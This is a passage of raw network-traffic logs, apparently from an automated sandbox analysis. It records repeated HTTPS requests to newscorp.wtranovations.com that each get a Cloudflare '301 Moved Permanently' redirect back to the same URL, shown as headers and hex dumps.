                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      23192.168.11.1249399104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:08 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23c87a896da4-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=127428&min_rtt=127379&rtt_var=26945&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=31659&cwnd=252&unsent_bytes=0&cid=f8a8524a3a849b0f&ts=319&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      24192.168.11.1249400104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC981INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:08 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:08 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mfAad%2FSI%2Btv04dUHtTQUKRmqpfM4P9sHEpEm2GEoAyOq%2FcH0OWvJiS84rj4ciNDlC8oY8mlS674bXIIHimTt7qlDgSMcLW1H2aiHsWuHcfNZBnJcBUMG25sq5S3AbxSPDh8WDy0NurcJzqQbKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Server-Timing: cfL4;desc="?proto=TCP&rtt=58&min_rtt=57&rtt_var=24&sent=2&recv=5&lost=0&retrans=0&sent_bytes=1231&recv_bytes=1277&delivery_rate=962985294&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      CF-RAY: 923e23ca5ccfda97-MIA
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      25192.168.11.1249401104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:08 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:09 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 3
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23cc2b2cda17-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129027&min_rtt=129001&rtt_var=27254&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=31275&cwnd=252&unsent_bytes=0&cid=ae25708e6b80ac9b&ts=317&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      26192.168.11.1249402104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC1194INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:09 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:09 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tBnCYX9KMGhgDOn3RrQgNwp62ww3PG9iYFqAovTglNS1iT%2B5fwLHhHumsiegAYyWKyJQ6%2B%2BJUdFqIkzItM%2FZbPRlRqJnyr90uyY2kMImdMS6Lsz%2FEkDIJb7HanLPTW%2BjvBFNKr4SYcqBI1%2Fodw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=72&min_rtt=72&rtt_var=36&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=608&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23ce1a1825b9-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=127572&min_rtt=127454&rtt_var=27063&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=991&delivery_rate=31591&cwnd=252&unsent_bytes=0&cid=86b0b772196c5b04&ts=347&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      27192.168.11.1249403104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:09 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 3
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23cfebeca533-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=134267&min_rtt=134175&rtt_var=28443&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=30028&cwnd=252&unsent_bytes=0&cid=10f1480e6f51255c&ts=328&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      28192.168.11.1249404104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:09 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC1194INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:10 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:10 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vyvFVyZa4HsJpN3LEj4NLeVl5%2FodpOPV3dmoGNYE19jPGrJcbfB5qhGNsePS543p2SLGMb%2BG%2F%2F1cBkJljT%2B8fjGB%2FJjN8zFWdH5Wh8cOAObhQdZviFDXhbkPWKUwmJWSkLtnxox%2Fu1I7QkiPwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=54&min_rtt=54&rtt_var=27&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=608&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23d219d29acc-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=134099&min_rtt=134063&rtt_var=28336&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=991&delivery_rate=30091&cwnd=252&unsent_bytes=0&cid=5e37c71b07823e02&ts=351&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      29192.168.11.1249405104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:10 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 4
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23d39d81498a-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=127476&min_rtt=127370&rtt_var=27033&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=31614&cwnd=252&unsent_bytes=0&cid=afd97fe6a900a7ba&ts=319&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:10 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
